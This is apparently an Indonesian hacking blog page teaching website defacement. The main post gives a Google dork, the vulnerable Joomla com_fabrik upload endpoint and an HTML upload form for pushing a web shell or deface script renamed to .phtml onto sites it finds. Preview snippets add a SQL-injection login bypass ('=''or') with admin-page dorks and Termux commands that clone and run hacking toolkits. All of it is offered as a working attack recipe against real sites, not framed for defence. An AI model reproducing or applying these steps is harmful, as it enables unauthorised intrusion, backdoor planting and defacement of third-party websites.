TUTORIAL DEFACH

-
DEFACH METODE CSRF
#defach metode csrf


dede agil r


Sebelum deface sebaiknya kita mempersiapkan alat dan bahan
-Shell Backdoor IndoXploit OR Adewamini
-Script Deface (Saya rasa udah punya sendiri-sendiri)
-Dork
 -Inurl:index.php?Option=Com_Fabrik
-Exploit YA
 /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-CSRF
 AMBIL DISINIH SOB Di Sini
<form method="POST" action="http://site.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
 <input type="file" name="file" />
 <button>
  Upload
 </button>
</form>
1. Dorking ke gogle atau image seperti ngedork biasa. 


2. Masukkan exploit Contoh www.site.com//index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

3. Jika Vuln akan ada {"filepath":null,"uri":null} Seperti ITUH


4. Buka csrf pastekan atau tempel web dan exploit yg kita dapat


5. Buka csrf menggunakan browser. Uploadkan Shell or Backdoor atau Script Deface kalian, Script backdoor harus di bypass dulu. Bypass menjadi phtml



Komentar

Posting Komentar

Postingan populer dari blog ini

tols termux bajingan dll

-
Gambar
body bgcolor="black" center> TOLS BAJINGAN §   Update dan upgrade termux dengan perintah $ apt update && apt upgrade §   Install python dengan perintah $ apt install python2 §   Install juga ruby dengan perintah $ apt install ruby §   Kalian juga harus menginstall git $ apt install git §   Sekarang kalian tinggal mengclone tools Bajingan dengan perintah $ git clone https://github.com/DarknessCyberTeam/B4J1N64Nv5 §   Tunggu hingga proses cloning selesai, lalu masuk ke directory nya $ cd B4J1N64Nv5 §   Selanjutnya kalian tinggal menjalankan tools nya dengan perintah $ sh B4J1N64N.sh §   Berikut tampilannya TOLS BAJINGAN V5 $ apt update && apt upgrade $ apt install python2 $ apt install ruby $ apt install git $ git clone  https://github.com/DarknessCyberTeam/B4J1N64Nv5 $ cd B4J1N64Nv5 $ sh B4J1N64N.sh TOLS BAJINGAN V6 apt update apt upgrade apt install php...
Baca selengkapnya

defach bypas admin

-
bahan ke dork kan ke scrift html/shell php kan ke tampan an ke sabara an  ke kopian ai napa ke ke semua dork inurl:/admin.php intext:login intext:adminsitrator     inurl:/admin/index.php intext:username     inurl :/admin/Admin.php intext:login      inurl:/administrator/login.php intext:username site:.     inurl:/login.php intext:administrator intext:login pertama lu dorking dulu misalkan gua pake dork inih\    inurl:/login.php intext:administrator intext:login kalo udah pilih salah satu yang lu temuin di google hehe tru lu masukin user name ama pasword ('=''or') ya misal : username : '=''or'   pasword : '=''or' ingat semua pake tanda petik (') bukan (") kalo vuln pasti masuk ke halaman admin dan kalo ngga skip aja hehe  nah kalo lu dah dapet masuk dasbohr atau apa ke tempat upload sheal/html lu oke segitu aja hehe kalo bingung nanti w kasih lagi gan ya hehe 🎯🎯
Baca selengkapnya

tols ghost cyber

-
#tolls ghost_cyber bima jabang oke dikali ini gua akan shear tolsya bima jabang soob atau thols ya ghost_cyber ituh pasti kenal dong nama ya ga asing lagih kan iya lah langsung aja ya jan bayak bacot lagi kuyp lah <<=====>> pkg update && pkg upgrade pkg install figlet pkg install php pkg install python python2 vim figlet curl pip2 install lolcat pkg install git git clone https://github.com/cyberghost69/bima-bagus-jabang-v3 cd bima-bagus-jabang-v3 sh bima-bagus-jabang-v3.sh USER: bima-jabang PASWD: jabang <<=======>>> apt update && apt upgrade pkg install python python2 pkg install php pkg install ruby pkg install lolcat pkg install bash(sunah) pkg install git git clone https://github.com/intect15/bima-jabang cd bima-jabang ls sh BIMA-JABANG#1.sh =============== pkg update && pkg upgrade pkg install figlet pkg install php pkg install python python2 vim figlet cur...
Baca selengkapnya